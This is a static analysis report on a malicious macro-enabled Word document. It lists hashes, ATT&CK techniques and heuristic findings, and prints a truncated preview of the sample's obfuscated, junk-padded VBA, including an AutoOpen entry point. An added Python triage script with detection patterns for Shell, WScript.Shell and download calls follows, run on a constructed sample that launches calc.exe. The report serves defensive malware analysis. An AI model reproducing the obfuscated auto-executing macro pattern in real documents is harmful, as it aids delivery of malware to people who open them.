Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 164222b3be80f9ef…

MALICIOUS

Office (OLE)

Size: 171.0 KB
Created: 2018-04-26 19:50:00
Authoring application: Microsoft Office Word
First seen: 2019-05-31
MD5: 4d85d0ffa969f12556d7745e05ca9abd
SHA-1: 6796d832baccfbf7f70d496e0610d60889b7b1f2
SHA-256: 164222b3be80f9ef57549877b400ebe0479c31cc6c9344d0833701adf6985938
Risk Score: 142

Malware Insights

MITRE ATT&CK
T1059 Command and Scripting Interpreter
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File

The sample is a Word (OLE) document carrying a VBA project, as flagged by OLE_VBA_MACROS, with an Autoopen entry point (OLE_VBA_AUTOOPEN), so the macro runs as soon as the document is opened with macros enabled. The critical OLE_VBA_SHELL finding indicates a Shell() call somewhere in the recovered source, the usual way for a maldoc to spawn an interpreter or launch a downloaded second stage; the call is not in the truncated preview below, so the full macros.bas artifact is where to confirm it. What the preview does show is heavy junk code: every procedure is padded with Select Case blocks on uninitialised variables, constant Case labels, and assignments wrapping Round(), Hex(), CByte() and Log() calls, and Autoopen starts with On Error Resume Next so that any failing reference is swallowed. The only live statement in Autoopen is a call to dCzIVMCGIzH with three concatenated variables, and that procedure is not defined in the visible portion of the module. Note that the OLE_LEGACY_WORDBASIC_AUTOEXEC description states that no modern VBA project was recovered, which conflicts with the extracted 57347-byte macros.bas; treat that finding as redundant with OLE_VBA_AUTOOPEN rather than as separate evidence.

Heuristics (5)

  • OLE_VBA_MACROS (medium, 2 related findings): VBA macros detected
    Document contains VBA macro code.
  • OLE_VBA_SHELL (critical): Shell() call in VBA
    The decoded macro source contains a call to the VBA Shell() function, which starts an arbitrary program or command line from the macro.
  • OLE_VBA_AUTOOPEN (high): AutoOpen macro
    The VBA project defines an AutoOpen procedure, which Word runs automatically when the document is opened with macros enabled.
  • OLE_LEGACY_WORDBASIC_AUTOEXEC (medium): Legacy WordBasic auto-exec macro marker
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • EMBEDDED_URL (info): Embedded URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the standard DrawingML schema namespace embedded by any document with drawing content; it is not a network indicator.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 57347 bytes
SHA-256: 91d4809cd9d829c285629940a6ac2870758e35c8da0f2b1c3b4a31fa643d4e75
Script preview (first 1,000 lines of the extracted macro source):
Attribute VB_Name = "GuwFPTcvSX"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub RdaKs(EDtwB)
Select Case CrAjvD
         Case 11003
            wtGhqV = izZuj
            VpQYv = Round(42378)
            XsZZQ = Hex(XXYjT - ChrW(EJFXWs))
            XEWDT = SFjBj
         Case 15381
            jELGU = CByte(63999)
            QzqKT = Log(ziOQS)
End Select
End Sub
Sub fawzBo(VwUqV)
Select Case YTNAww
         Case 6140
            bEaNMk = DnqQj
            cZiGJR = Round(29064)
            TvHUV = Hex(mmiQRO - ChrW(EWYjp))
            rRKiZ = wvuito
         Case 63378
            iHISsq = CByte(80130)
            RIZzUm = Log(CKWUN)
End Select
Select Case tIQhi
         Case 45473
            sHlcka = wOFrz
            PABFa = Round(34421)
            XrUWT = Hex(Qkwsl - ChrW(SqiJX))
            OtMboF = VzHtGL
         Case 13230
            MbBnO = CByte(16893)
            KpzVU = Log(jXjqiI)
End Select
Select Case YwwCO
         Case 82978
            TIrrji = GOhWJn
            iXdSkw = Round(77703)
            bCcCvs = Hex(fwYXJ - ChrW(CzFpqm))
            IzUUU = pbSjd
         Case 84966
            rhpOi = CByte(67329)
            tjjzm = Log(zjaXdu)
End Select
End Sub
Sub OSciI(hClMOv)
Select Case zGVIrK
         Case 13469
            jZPWhq = IBvGi
            wYFGGw = Round(3106)
            HXUCHi = Hex(LRjSnb - ChrW(tMLaqT))
            kRIMzD = PBkOFl
         Case 47744
            vTaMU = CByte(94259)
            OnuEOf = Log(ufFiEW)
End Select
Select Case MqIbL
         Case 91753
            vEipJ = RrAiwz
            CURup = Round(4447)
            HEIXh = Hex(wjdRl - ChrW(BUSjM))
            EobDf = jHVDrZ
         Case 27038
            JYIrvL = CByte(15930)
            uiOit = Log(vjjlEf)
End Select
End Sub
Sub Autoopen()
On Error Resume Next
Select Case OvDYhn
         Case 49225
            trEDzz = LboAGz
            tozhtL = Round(78796)
            FUiBv = Hex(ESNYib - ChrW(qJiuq))
            VIzEY = UBPbAt
         Case 26762
            ZmkVzD = CByte(98727)
            JacYW = Log(DfTnDs)
End Select
dCzIVMCGIzH (KIQKO + sTuhFQAJhGL + bprMiU)
Select Case bEZJwm
         Case 38283
            zWbAQ = wjHNqV
            OdULj = Round(55297)
            RRNwD = Hex(RwFKqQ - ChrW(FLloJ))
            zcFjzn = MMaFwM
         Case 19051
            zhIczi = CByte(20621)
            izWZwS = Log(sfBld)
End Select
End Sub
Sub LiOKEZ(YAMdG)
Select Case IdcLMT
         Case 77949
            bmdOCu = iZwbj
            lzuSs = Round(8930)
            bdksT = Hex(JZPTo - ChrW(oRjvk))
            BfvqbP = abWii
         Case 87968
            OiCwB = CByte(70076)
            hkjTGI = Log(rjBDJ)
End Select
Select Case rZKkC
         Case 40559
            stnujZ = DGPlu
            BTuLX = Round(40226)
            uirVa = Hex(XcpYR - ChrW(juCozo))
            jnElUP = JUXiw
         Case 26540
            NvJBRU = CByte(15745)
            sOiwq = Log(GwfzW)
End Select
Select Case oUpzXF
         Case 32664
            DEKZD = Twsnf
            iiupC = Round(41775)
            vDVsh = Hex(cssGMd - ChrW(DswnE))
            ubuHG = RCGKZz
         Case 90683
            fVMhM = CByte(55981)
            aVarjJ = Log(RlfHl)
End Select
End Sub
Sub azBvPA(ZWiSG)
Select Case bjijR
         Case 51502
            KUGUPa = wkViSN
            bhTRS = Round(24120)
            YEmHl = Hex(hmjEO - ChrW(KjGrjf))
            RRoAEz = PAwOPz
         Case 27389
            mQUNi = CByte(20395)
            MBQQm = Log(RUqml)
End Select
End Sub

Attribute VB_Name = "uwkDiHszhnU"
Sub PSzzqW(AiQEm)
Select Case oNpzfH
         Case 53868
            WTRBMm = mKTYh
            AUFUiU = Round(35900)
            wdrzTu = Hex(CCBfsM - ChrW(wfvdkO))
            TzjFJ = skcBnJ
         
... (truncated)
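Added example, not part of the original report and not oletools code: a small static triage pass over decoded VBA source of the kind shown in the preview above. It recovers the auto-exec entry points and suspicious calls that the OLE_VBA_AUTOOPEN and OLE_VBA_SHELL heuristics key on, and adds two things the preview makes an analyst want: the share of each entry point that is Select Case/Round/Hex/CByte/Log padding, and the non-junk procedures it calls, split into those defined in the source and those that are not. SAMPLE_VBA is constructed for the example: its first module imitates the style of the preview (procedure and variable names reused from it), while the second module (ConstructedModule, Document_Close, RunIt) is hypothetical and exists only to exercise the suspicious-call path; nothing in it was recovered from this sample.

```python
"""Static triage of decoded VBA source: auto-exec entry points, suspicious
calls, junk-code ratio and the live call graph of each entry point.
Added example; not part of the original report or of oletools."""
import json
import re

# Procedure names that Office runs without user interaction (case-insensitive).
AUTOEXEC_NAMES = {
    "autoexec", "autoopen", "autoclose", "autoexit", "autonew",
    "document_open", "document_close", "document_new",
    "workbook_open", "workbook_activate", "workbook_close",
    "auto_open", "auto_close",
}
# Calls worth a closer look; longer alternatives first so that
# "WScript.Shell" is reported once rather than as a bare "shell" hit.
SUSPICIOUS_RE = re.compile(
    r"\b(?:wscript\.shell|urldownloadtofile|createobject|getobject|"
    r"callbyname|powershell|environ|shell|kill)\b", re.I)
# Built-ins that look like calls but are not user-defined procedures.
VBA_BUILTINS = {
    "round", "hex", "chr", "chrw", "cbyte", "cint", "clng", "cstr", "log",
    "len", "mid", "left", "right", "replace", "split", "join", "array",
    "ucase", "lcase", "trim", "asc", "strreverse", "iif", "isempty",
    "createobject", "getobject", "shell", "environ", "callbyname",
}
MODULE_RE = re.compile(r'^Attribute VB_Name = "([^"]+)"')
PROC_RE = re.compile(r"^\s*(?:Public |Private )?(?:Sub|Function)\s+(\w+)\s*\(", re.I)
END_PROC_RE = re.compile(r"^\s*End (?:Sub|Function)\b", re.I)
CALL_RE = re.compile(r"\b([A-Za-z_]\w*)\s*\(")
# The padding pattern seen in the preview: Select Case on an uninitialised
# variable, constant Case labels, and Round/Hex/CByte/Log assignments.
JUNK_RE = re.compile(
    r"^\s*(?:Select Case \w+|Case \d+|End Select"
    r"|\w+ = (?:Round|CByte|Log|Hex)\(.*\)|\w+ = \w+)\s*$", re.I)


def split_procedures(src):
    """Return {name: (module, body_lines)} for every Sub/Function in src."""
    procs, module, current, body = {}, "?", None, []
    for line in src.splitlines():
        m = MODULE_RE.match(line)
        if m:
            module = m.group(1)
            continue
        if current is None:
            m = PROC_RE.match(line)
            if m:
                current, body = m.group(1), []
            continue
        if END_PROC_RE.match(line):
            procs[current] = (module, body)
            current = None
        else:
            body.append(line)
    return procs


def live_lines(body):
    """Body lines that are neither blank nor junk padding."""
    return [l.strip() for l in body if l.strip() and not JUNK_RE.match(l)]


def junk_ratio(body):
    """Share of non-blank body lines that match the padding pattern."""
    lines = [l for l in body if l.strip()]
    return round(1 - len(live_lines(body)) / len(lines), 2) if lines else 0.0


def calls_in(body):
    """Identifiers used as calls in the body, minus VBA built-ins."""
    return [n for l in body for n in CALL_RE.findall(l)
            if n.lower() not in VBA_BUILTINS]


def triage(src):
    procs = split_procedures(src)
    defined = {n.lower(): n for n in procs}
    report = {"procedures": len(procs), "autoexec": {}, "suspicious": {}}
    for name, (module, body) in procs.items():
        for hit in sorted({h.lower() for h in SUSPICIOUS_RE.findall("\n".join(body))}):
            report["suspicious"].setdefault(hit, []).append(name)
        if name.lower() not in AUTOEXEC_NAMES:
            continue
        callees = calls_in(body)
        report["autoexec"][name] = {
            "module": module,
            "junk_ratio": junk_ratio(body),
            "live": live_lines(body),
            "calls_defined": sorted({defined[c.lower()] for c in callees if c.lower() in defined}),
            "calls_unresolved": sorted({c for c in callees if c.lower() not in defined}),
        }
    return report


# Constructed input: module 1 imitates the preview's style (names reused from
# it); module 2 is hypothetical and only exercises the suspicious-call path.
SAMPLE_VBA = '''Attribute VB_Name = "GuwFPTcvSX"
Sub RdaKs(EDtwB)
Select Case CrAjvD
         Case 11003
            wtGhqV = izZuj
            VpQYv = Round(42378)
            XsZZQ = Hex(XXYjT - ChrW(EJFXWs))
         Case 15381
            jELGU = CByte(63999)
            QzqKT = Log(ziOQS)
End Select
End Sub
Sub Autoopen()
On Error Resume Next
Select Case OvDYhn
         Case 49225
            trEDzz = LboAGz
            tozhtL = Round(78796)
         Case 26762
            JacYW = Log(DfTnDs)
End Select
dCzIVMCGIzH (KIQKO + sTuhFQAJhGL + bprMiU)
End Sub

Attribute VB_Name = "ConstructedModule"
Sub Document_Close()
RunIt ("calc.exe")
End Sub
Sub RunIt(cmd)
Set w = CreateObject("WScript.Shell")
w.Run cmd, 0
End Sub
'''

if __name__ == "__main__":
    print(json.dumps(triage(SAMPLE_VBA), indent=2))
```

On the constructed input the pass reports Autoopen as roughly four-fifths padding with one unresolved callee (dCzIVMCGIzH), which is exactly the question the preview leaves open, and attributes the CreateObject/WScript.Shell hits to the hypothetical RunIt reached from Document_Close. Run it over the full macros.bas to locate the Shell() call that OLE_VBA_SHELL fired on and the definition of dCzIVMCGIzH.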